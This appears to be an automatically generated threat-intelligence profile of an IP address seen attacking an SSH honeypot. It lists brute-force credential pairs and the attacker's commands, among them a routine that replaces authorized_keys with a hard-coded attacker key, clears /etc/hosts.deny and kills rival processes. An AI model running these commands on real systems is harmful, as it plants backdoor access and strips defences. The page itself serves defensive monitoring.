Active Threat โ€ข HIGH

120.48.128.191

First Detection1/14/2026
Last Activity2/21/2026
ISPBeijing Baidu Netcom Science and Technology Co., Ltd.
๐ŸŽฏ
446
Total Attacks
๐Ÿ”Œ
1
Ports
๐Ÿ“ก
1
Attack Types
๐Ÿฆ 
20
Malware

Geolocation

Country
๐Ÿ‡จ๐Ÿ‡ณ China
City
Beijing
ASN
AS38365
ISP
Beijing Baidu Netcom Science and Technology Co., Ltd.

Attack Types

cowrie

Attacked Ports

22

Associated Malware

Attempted Credentials

๐Ÿ”root/root
2x
๐Ÿ”mainuser/mainuser
1x
๐Ÿ”mc3/mc3123
1x
๐Ÿ”db2fenc1/db2fenc1
1x
๐Ÿ”xl/123
1x
๐Ÿ”marge/123456
1x
๐Ÿ”reza/123
1x
๐Ÿ”sarah/sarah2025
1x
๐Ÿ”db2fenc1/db2fenc12025
1x
๐Ÿ”administrateur/administrateur
1x
๐Ÿ”caldera/caldera
1x
๐Ÿ”test1/test1
1x
๐Ÿ”shan/123
1x
๐Ÿ”rabbitmq/123
1x
๐Ÿ”root/Root12345
1x

Executed Commands

$cd ~; chattr -ia .ssh; lockr -ia .ssh2x
$cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~2x
$cat /proc/cpuinfo | grep name | wc -l2x
$lockr -ia .ssh2x
$uname -m1x
$free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'1x
$lscpu | grep Model1x
$cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'1x
$uname -a1x
$rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;1x

Risk Assessment

65
/100
LowMediumHighCritical